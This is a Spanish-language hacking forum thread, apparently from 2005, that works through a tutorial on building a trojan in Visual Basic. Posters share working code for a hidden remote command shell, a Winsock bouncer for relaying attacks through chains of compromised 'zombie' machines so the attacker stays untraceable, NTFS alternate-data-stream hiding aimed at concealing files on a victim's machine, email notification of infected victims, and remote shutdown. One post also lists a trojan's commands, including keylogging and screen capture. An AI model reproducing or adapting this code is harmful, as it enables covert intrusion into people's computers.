Tema destacado: Recuperar cuenta de Google, GMail, Youtube
Autor
|
Tema: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranManual (Leído 112,435 veces)
|
-Xenon-
Spectrum 128k
|
alililia: tu fallo es que para enviar los datos pones: Private Sub cmdfin_Click() Dim ruta As String ruta = "C:\" Open ruta & "fox.bat" For Output As #1 Dim datos As String Print #1, datos & ">" & ruta & "fox.txt"
'aqui no puedes poner una variable vacia dentro del archivo.bat tienes que poner la caja de testo:
Print #1, text2.text & ">" & ruta & "fox.txt"
' asi metera el comando que pongas en el text2, si no es imposible que quieras que ejecute una variable vacia, lo entiendes? para que ejecute el comando as de poner dentro del bat el comando y la forma mas facil es asi como te e puesto...
Close #1 Shell ruta & "fox.bat", vbHide Open ruta & "fox.txt" For Input As #1 Dim comando As String comando = Input(LOF(1), #1) Close #1 Call mostrar_Click End Sub
|
|
|
|
|
|
Cuando el ingenio se queda pequeño, No basta con poner empeño, Solo el talento consigue el diseño
|
|
|
-Xenon-
Spectrum 128k
|
la idea es: pc1 --------> pc2 -----------> pcx -----------> pcv nosotros bouncer bouncer victima 127.0.0.1:23 217.125.xxx.xxx:23 81.xx.xx.xx:23 200.xx.xx.xx:23 --------------------------------------------------------------------------- no tengo arte para los esquemas.. pero mas o menos eso representa que el bouncer sera de uno a los ordenadores que queramos , quiero decir que el bouncer puede ser un unico pc, o puede ser UNA CADENA de ellos, entonces: si nos conectamos al primer pc, por el puerto por ejemplo el 23, este nos redireccionara los datos a "otra" maquina, y aqui elejimos si sera otro bouncer o un server victima que queremos atacar, entonces ala hora de atacar al server, al aver pcs haciendo de zombis o intermediarios, nuestra ip se mantiene oculta y el servidor recivira la ip de la ultima maquina intermediario.... con esto conseguimos anonimato, y si usamos una cadena, el anonimato seria "casi" TOTAL!!! la victima necesitaria mucho dinero para buscarte por esa cadena 1-al no generar log el bouncer, para localizarte deberian ir hasta el ultimo pc de la cadena FISICAMENTE, esto quiere decir que si tienes 2 pcs haciendo de bouncer, uno en australia y otro en canada, tendran que ir hasta canada y australia.... 2-las oredenes de registro y etc.. que se necesitan ya que los pcs que haran de proxy o bouncer, no sabran de que va la cosa... ahora que ya sabemos la utilidad del bouncer vamos a ver como funciona: ----------------------------------------------------------------------------------- 0-el bouncer se pone ala escucha 1-nos conectamos al bouncer por ejemplo por el puerto 22(ssh) 2-el bouncer acepta la conexion y conecta con la victima por puesto 22 3-si nonostros enviamos datos al bouncer este los envia ala victima 4-si la victima manda datos al bouncer este nos los devuelve a nosotros. 5-si se cierra la conexion que se vuelva a poner a escuchar el bouncer ------------------------------------------------------------------------------------ '-----------------------paso 0-------------------------------- Dim ip As String
Private Sub Command1_Click() With Winsock1 .LocalPort = Text1.Text .Close .Listen End With With Winsock2 .RemoteHost = Text3.Text .RemotePort = Text2.Text End With End Sub '---------------------------------------------------------------------- '---------------------------paso 5----------------------------------- Private Sub Winsock1_Close() Winsock2.Close Winsock1.Close Winsock1.Listen End Sub '----------------------------------------------------------------------- '------------------pasos 1 y 2---------------------------------------- Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long) With Winsock1 .Close .Accept requestID End With Winsock2.Connect End Sub '-------------------------------------------------------------------- '----------------------------paso 3---------------------------------
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Dim datos As String Winsock1.GetData datos Winsock2.SendData datos End Sub '---------------------------------------------------------------------- '---------------------------paso 4------------------------------------ Private Sub Winsock2_DataArrival(ByVal bytesTotal As Long) Dim datos2 As String Winsock2.GetData datos2 Winsock1.SendData datos2 End Sub '------------------------------------------------------------------------
--------------------------------------------------------------------------- ahora ese codigo funciona, es sencillito y se puede acoplar al troyano desde el cual podamos cambiar los parametros siguientes: ip de destino puerto de entrada puerto de salida decir que ese codigo, configurado por ejemplo para atacar a 81.xx.xx.36 por el puerto 23, tanto de entrada como de salida: pues ahora ese codigo lo ejecutas en otro pc y te conectas a el usando telnet asi: telnet ipbouncer 23 y os llegaran los datos de la ip 81.xx.xx.36 como si estuvierais conectados directamente... un saludo!!!!!!
|
|
|
|
« Última modificación: 5 Abril 2005, 22:06 por fulano_ »
|
|
Cuando el ingenio se queda pequeño, No basta con poner empeño, Solo el talento consigue el diseño
|
|
|
-Xenon-
Spectrum 128k
|
hay un fallo en el sistema NTFS que usan los windows nt, y es que se pueden ocultar archivos "detras" de otros, sin alterar su codigo ,ni su tamaño. esto quiere decir que podremos ocultar un archivo de 300Mb(por ejemplo), "detras" de otro de 1kb, y solo verias el archivo de 1kb! --------------------------------------------------------------------------------- Dim var1 As String, var2 As String, var3 As String
Private Sub Command1_Click() On Error Resume Next cd.DialogTitle = "Abrir archivo a ocultar" cd.ShowOpen var1 = cd.FileName cd.DialogTitle = "Abrir archivo tras del cual se ocultara" cd.ShowOpen var2 = cd.FileName var3 = InputBox("elige el nombre de referencia" & vbCrLf & "Especifica su extension", "OCULTAR Nombre Clave") Open "c:\bat11.bat" For Output As #1 Print #1, "type " & var1 & ">" & var2 & ":" & var3 Close #1 Shell ("c:\bat11.bat") Open "c:\nt.txt" For Append As #1 Print #1, var2 & ":" & var3 Close #1 End Sub
Private Sub Command2_Click() cd.ShowOpen var2 = cd.FileName var3 = InputBox("elige el nombre de referencia" & vbCrLf & "Especifica su extension", "ABRIR Nombre Clave") Open "c:\bat11.bat" For Output As #1 Print #1, "start " & var2 & ":" & var3 Close #1 Shell ("c:\bat11.bat") End Sub
Private Sub Command3_Click() Open "c:\bat11.bat" For Output As #1 Print #1, "c:\nt.txt" Close #1 Shell ("c:\bat11.bat") End Sub
si seguisteis el curso del troyano entero, entendereis cada linea de codigo, y entendiendo cada linea de codigo entendereis como hace el efecto de ocultar el archivo y la forma de verlo... no lo voy a explicar mas ni sere mas claro, por que seria poneroslo muy muy en bandeja, se entiende sobradamente bien y es un codigo muy sencillo, asi que no tienes escusa para no comprender el fallo y como usarlo. ----------------------------------------------------------------------------- os recomiendo que esperimenteis vosotros mismos, y que arregleis el codigo ya que asi esta muy feo y se puede poner mucho mas profesional y no tan sucio. esperimentar y hacer pruebas, pero os aviso una cosa, el codigo en ningun momento borra el archivo a ocultar, lo amntiene por si las moscas, si quereis podeis hacer que lo borre, ya que si la mision es ocultarlo, la copia que queda ay que eliminarla, y la copia oculta estara "detras" del archivo destino, con un nombre clave que es elejido por vosotros y cuta terminacion siempre a de terminar en la extension del archivo a ocultar... esta forma viene muy bien para acoplarla al server del troyano y poder ocultarle archivos en la victima de forma perfecta e indetectable, es mas si se te olvida el nombre clave que elejiste y el archivo destino donde se encontraba, perdereis el archivo para siempre, de hay que la llame ocultacion EXTREMA por si las moscas el tercer boton del codigo abre un archivo de texto con los archivos destino y los nombres claves de los archivos ocultos, con el fin de no olvidarlo y no tener el problema de perderlos si teneis dudas preguntar en este hilo!! disfrutarlo con salud! un saludo!
|
|
|
|
« Última modificación: 5 Abril 2005, 22:38 por fulano_ »
|
|
|
|
|
lamaquina
|
 primero felicitarte por esta fantastico manual , la verdad esta muy bien esplicado , y admiro a la gente como que le gusta compartir conocimientos , no como muchos que no les gusta compartir y piensan que asi son mejor que la mayoria por que solo unos pocos conocen dicha tecnica en fin....... Ahora cambiando de tema queria plantarte una duda ok??? Ahi va, SI yo tengo un router,y me pongo el programa no- ip para el tema de la actualizacion de ip dinamica, bueno tu eso ya lo sabes.la ip que me actualiza es la de mi maquina local ,no la la ip real , por lo tanto este programa no funciona. Verdad o mentira?? ejemplo ipconfig/all muestra mi ip local 192.168.1.4 ip real que debes buscar en internet 83.123.34.56 y la ip que actualiza es la 192.168.1.4 Vamos que no funciona, es una ***** , a no ser que alguien sepa como solvenar este problema ??? ??? ??? ???
|
|
|
|
|
|
|
|
|
-Xenon-
Spectrum 128k
|
te actualiza la ip publica, la real. haces ping a tu nombre no-ip?
ping nombre.sytes.net
por ejemplo...
------------------------------------------------------------------------
cuando inicias el programa no-ip e sale abajo tu ip real yte dice en ingles que a sido actualizada, o que no necesita actualizarse. no te preocupes por tener router, yo tambien lo tengo y no ay problema, me sale lo mismo que aty enel ipconfig /all
de todas maneras tienes un manual sobre no-ip en este foro, en una chincheta, consultalo!!!! pero te repito que no ay problema, si cuando te registraste, VISTE tu ip real reflejada ( te la pone en un momento mientras te registras, en un apartado ), pues ay verias si te reconoce tu ip publica, primero prueba a hacer un ping a tunombre no-ip, luego revisa el programa que te salga una carita sonrriente y sonrrojada al lado de el nombre de dominio que elejiste, y si nada de eso funciona, pide ayuda despues de leeer ese manual sobre no-ip que ay en este foro!!!
losiento si no puedo hacer mas por ti!!!!
MUCHAS GRACIAS por las felicitaciones, compartir el conocimiento es lo mejor que sepuede hacer, y lo menos que puedo hacer, por que yo empece en este foro, y yo he leido manuales yyo he preguntado mucho como newbye, y por fin puedo aportar algo, y eso se lo debo a todos, y la sarisfacion de saber que puedo ayudar ala gente que estaba COMO YO, cuando comence!!!!
un saludo!!!
|
|
|
|
|
|
|
|
|
stanley65550
|
quisiera saber como hago para agregarle a mi server que hice en visual basic para que cuando se ejecute quede como recidente en la memoria y al ejecutarse no se muestre nada en la pantalla. tambien quiero saber como agregarle la opcion de shutdown, y transferencia de archivos. gracias!!!! 
|
|
|
|
|
|
|
|
|
BenRu
The Prodigy
|
Lo primero no se que quieres decir... ??? Y el shutdown utiliza la shell shell "shutdown -s -f -c ""mensaje"""
|
|
|
|
|
|
|
|
|
-Xenon-
Spectrum 128k
|
quisiera saber como hago para agregarle a mi server que hice en visual basic para que cuando se ejecute quede como recidente en la memoria y al ejecutarse no se muestre nada en la pantalla. tambien quiero saber como agregarle la opcion de shutdown, y transferencia de archivos. gracias!!!!  no voy a responder a este tipo de post y nadie deberia hacerlo, preguntas por la transferencia de archivos???? posteas en este hilo sin habertelo leido... en fin.... llegas a ser mas vago y casi ni te da por teclear la pregunta...
|
|
|
|
|
|
|
|
|
|
Rey11
|
Yo creo que está muy bien sin embargo hay una cosa que no hemos visto, la notificación por email. Es muy útil que los troyanos nos notifiquen por email, sobre todo a los que usamos msn. Como se hace esto: Dim Enter ' Voy a utilizar variable global Enter Private Sub Form_Load() On Error Resume Next ' Detector de Errores Activado If Sock1.State <> 0 Then ' Si tiene una conexion abierta Sock1.Close ' Cerrar la conexion End If Sock1.RemoteHost = "mx2.hotmail.com" ' Le digo cual es el Servidor de SMTP, por razones que desconozco este server ya no funciona Sock1.RemotePort = 25 ' El puerto a donde conectarse (SMTP) Sock1.Connect ' Intenta la conexion... Enter = Chr(13) + Chr(10) ' Inicializo la variable global Enter End Sub Private Sub Sock1_Connect() On Error Resume Next ' Detector de Errores Activado Sock1.Tag = 1 ' Pongo que voy en el paso 1 Sock1.SendData "HELO " & "reydelmundo11" & Enter ' Le envio un comando al Servidor y 1 Enter End Sub Private Sub Sock1_DataArrival(ByVal bytesTotal As Long) On Error Resume Next ' Detector de Errores Activado Sock1.GetData Datos, vbString ' Recibir en Datos If Mid(Datos, 1, 9) = "550 Relay" Then ' Revisar si permite Relay 'el servidor no deja mandar los datos sin cuenta de correo en ese caso desconectamos Sock1.Close ' Cerrar conexion Sock1.Tag = 0 ' Digo que ya se acabo End If If Sock1.Tag = 1 Then ' Si voy en el paso 1 Sock1.SendData "RSET" & Enter ' Le envio RSET Sock1.Tag = 2 ' Digo que voy al siguiente paso GoTo fin ' Ir al final End If If Sock1.Tag = 2 Then ' Si voy en el paso 2 Sock1.SendData "MAIL FROM: <" & MiMail & ">" & Enter ' Le envio MiMail mi mail es una varible asegurate de tenerla definida  Sock1.Tag = 3 ' Digo que voy al siguiente paso GoTo fin ' Ir al final End If If Sock1.Tag = 3 Then ' Si voy en el paso 3 Sock1.SendData "RCPT TO: <" & ParaMail & ">" & Enter ' Le envio ParaMail  También es otra varialbe If CCMail <> "-" Then ' Si tiene para un Mail CC (con copia, creo) Sock1.SendData "RCPT TO: <" & CCMail & ">" & Enter ' Le envio CCMail  también es otra es para enviarlo a mas gente End If Sock1.Tag = 4 ' Digo que voy al siguiente paso GoTo fin ' Ir al final End If If Sock1.Tag = 4 Then ' Si voy en el paso 4 Sock1.SendData "DATA" & Enter ' Aqui le envio DATA (Empieza el mail) Sock1.Tag = 5 ' Digo que voy al siguiente paso GoTo fin ' Ir al final End If If Sock1.Tag = 5 Then ' Si voy en el paso 5 Sock1.SendData "To: " & ParaMail & Enter ' Le envio para quien va la variable otra vez Sock1.SendData "From: " & "reydelmundo11" & " <" & MiMail & ">" & Enter ' El Nombre reydelmundo11 y MiMail Sock1.SendData "Subject: " & "la víctima" & Enter ' El Subject (Titulo) Sock1.SendData Enter ' Un Enter indica que empieza el Mensaje Sock1.SendData "Aqui vendría la ip y todo eso" & Enter ' Le envio el Mensaje Sock1.SendData "." & Enter ' Esto indica fin del mail Sock1.Tag = 6 ' Digo que voy al siguiente paso GoTo fin ' Ir al final End If If Sock1.Tag = 6 Then ' Si voy en el paso 6 Sock1.SendData "QUIT" & Enter ' Le indico que cierre la conexion Sock1.Tag = 7 ' Digo que voy al ultimo paso GoTo fin ' Ir al final End If If Sock1.Tag = 7 Then ' Si voy en el paso 6 Sock1.Tag = 0 ' Digo que ya se acabo Sock1.Close ' Cierro la conexion 'ya lo hemos enviado GoTo bien ' Ir al final End If bien: End Sub ------------------------------------------------------------------------- Puede que haya metido algún error revisadlo. Pero básicamente estos son los pasos para enviar un email. Teneis que crear un control winsock llamado sock y ponerle tag 0. Que tengaís suerte con la notificación por email, y a ver si encontráis un server que hos funcione  . Un saludo de Reydelmundo11 
|
|
|
|
|
|
|
|
|
|
Rey11
|
He visto un error se me ha olvidado definir la etiqueta fin y solo he definido la de bien:, es que no se adonde tengo la cabeza en fin tenez en cuenta ese error ponez una etiqueta al final que sea fin: Un saludo de Reydelmundo11
|
|
|
|
|
|
|
|
|
-Xenon-
Spectrum 128k
|
me parece estupendo que espliques eso y para colmo que lo espliques comentando cada linea de codigo!! ME PARECE GENIAL!!! yo pense que ya nadie colaboraria, pero este hilo a modo de tutorial , tambien tenia el fin de que ga gente que le gustara como a ti y ami, pues fuesemos aumentandolo y proponiendo ideas y engrandeciendolo, resumiendo, tomarlo como un proyecto y ir mejorandolo. gracias por tu esplicación!!!!! un saludo!!! 
|
|
|
|
|
|
|
|
|
|
Rey11
|
Bueno, otra cosa que tampoco se ha mencionado y que a mi me gusta personalmente mucho es: El reinicio, apagar y cerrar sesión del sistema. Incluyendo iniciar el salvapantallas de la víctima  Lós códigos son muy simples, de todas formas seguiré buscando en mi disco duro más códigos interesantes  aunque no prometo nada mi ordenador parece una selva. ----------------------------------------------------------------------- 'Fuera de las rutinas definimos las siguientes librerías Dim Accion As Long Private Declare Function ExitWindowsEx Lib "user32" (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long 'Son declaraciones para reiniciar, apagar y cerrar sesión del equipo 'Aquí lo pondremos de forma visual, o sea el usuario elige lo que quiere hacer, no hos tante en vuestro troyano devereis de ocultarlos, quiero decir que los códigos respondan a mensajes del troyano. Ej el cliente envía apa y esto responde apagando el equipo Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long Const comWM_SYSCOMMAND = &H112& Const cSC_SCREENSAVE = &HF140& 'Estas son declaraciones para el screensaver  Private Sub Command1_Click() Resultado = ExitWindowsEx(Accion, 0&) 'El resultado es igual a apagar el ordenador con el método que eligamos ej End Sub Private Sub Option1_Click() 'reiniciar Accion = 2 End Sub Private Sub Option2_Click() 'apagar Accion = 1 End Sub Private Sub Option3_Click() 'cerrar sesión Accion = 0 End Sub 'Son diferentes eventos y la variable en cada evento toma un valor, luego una vez elegida una opción al dar al botón command1 hace la acción de apagar reiniciar etc.. ------------------------------------------------------------------------- Todo esto ya hemos hecho para que reinicie pero si hos acordais arriba hemos definido Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long Const comWM_SYSCOMMAND = &H112& Const cSC_SCREENSAVE = &HF140& 'Pues ahora lo ponemos en práctica Private Sub Command2_Click() Dim Resultado As Long 'Dimensionamos la variable resultado Resultado = SendMessage(Me.hwnd, comWM_SYSCOMMAND, cSC_SCREENSAVE, 0&) 'Y el resultado es el mensaje de poner el salvapantallas End Sub ------------------------------------------------------------------------- Por cierto teneis que definir dos botones llamados command1 ,command2 y también 3 botones de opciones llamados option1, option2, opcion3 -------------------------------------------------------------------------  y con estó está todo, hos recopiedo que copies y pegueis el código al visual basic para examinarlo mejor pues a quí es un poco lioso, algunas cosas no las he probado, pero lo de cerrar sesión y el salvapantallas si y creo que lo otro funcionará. Como suelo poner mira si hay algún error puesto que muchas veces se me cuelan  ------------------------------------------------------------------------- Animaos a poner códigos en el tutorial a todo el mundo les beneficiará  ------------------------------------------------------------------------- Un saludo de Reydelmundo11  y a ti fulano_ gracias por poner aquí tutoriales sobre todo lo de enviar fichero y la notificación por irc me están siendo muy útil.  -------------------------------------------------------------------------- En el próximo mensaje cd-rom y otras cosas interesante que encuentre y si algíen sabe ocultar el escritorio, ocultar el botón inicio o ocultar el tiempo que lo ponga. ???
|
|
|
|
|
|
|
|
|
-Xenon-
Spectrum 128k
|
en este link encontraras esas cosas que buscas, casi todo son usando apis y etc... es muy sencillo http://www.controltotal.org/VB/VB.htmun saludo!!!!
|
|
|
|
|
|
|
|
|
Cicklow
-=Cicklow SOFT®=-
|
Yo estoy creando un troyano completo en VB, en cuanto lo termine, vere si lo cuelgo aka (parte ya que lo que hay que hacer es que los otros aprendan). Mi troyano no usa aviso por email de cuando esta conectado un usuario sino que encontre una forma de hacer que si el ejecuta primero el server o si yo ejecuto primero el cliente el admin me avisa (el cliente). A el server le paso comandos como: /msg texto tipo: envia un mensaje al usuario, texto=el texto, tipo 0 o 1; 0: icono rojo, 1= icono amarillo con !.
/capturar: captura la pantalla
/keylog: keylogger
/subir fichero: sube un fichero
/descargar fichero: descarga un fichero
/ejecutar fichero: ejecuta un fichero
/listar unidad:\dir\*.*: lista todos los archivos que hay en ese dir
/dir unidad: listar los directorio de la unidad o dir
/f archivo: busca un archivo
/blokear,: blokea la pc
/boot Nª: apaga (1) o reinicia la pc (2)
/regA key: agrega una linea al registro de windows
/regV key: visualiza un registro en el reg
/regD key: borra un registro
etc..... con muchas cosaas mas hasta ahora lo que mas me esta dando problemaS es el envio de archivos, pero lo voy a solucionar con un ftp o php... Bye
|
|
|
|
|
|
|
|
|
-Xenon-
Spectrum 128k
|
aver, yo cree este tutorial para ir enseñando paso a paso... y ala vez deje que la gente respondiera y preguntara en este mismo hilo. Esto a perjudicado bastante, por que ahora la gente no lee el tutorial entero, por que no sabe que despues de las respuestas publico mas tutorial....
quizas deberia haber otro hilo aparte para las preguntas y respuestas y colgar solo el tuto independiente, asi seria mas claro para todos!!
por que digo esto? por que por ejemplo tu Cicklow que dices que no sabes hacer la transferencia de archivos, que digas que no sabes hacerlo en este hilo.. pues... eso demuestra que no te lo as leido, quizas por que pensarias que solo puse la cnexion como tutorial o yo que se...
pero NO, EN ESTE HILO EXPLICO VARIAS COSAS:
----------------------------------------------------------------------- CONEXION CONSOLA VIRTUAL REMOTA TRANSFERENCIA DE ARCHIVOS NOTIFICACION POR IRC BOUNCER OCULTACION EXTREMA DE ARCHIVOS
y reydelmundo11 aporto con:
NOTIFICACION POR EMAIL APAGAR PC REINICIAR PC ACTIVAR SALVAPANTALLAS
-------------------------------------------------------------------------
con lo cual quiza coja de este hilo todo lo esplicado y lo separare de las preguntas y respuestas, para que quede separado y mas legible...
si alguien tiene alguna sugerencia con este problema, que hable!
un saludo!!!
|
|
|
|
|
|
|
|
|
|
|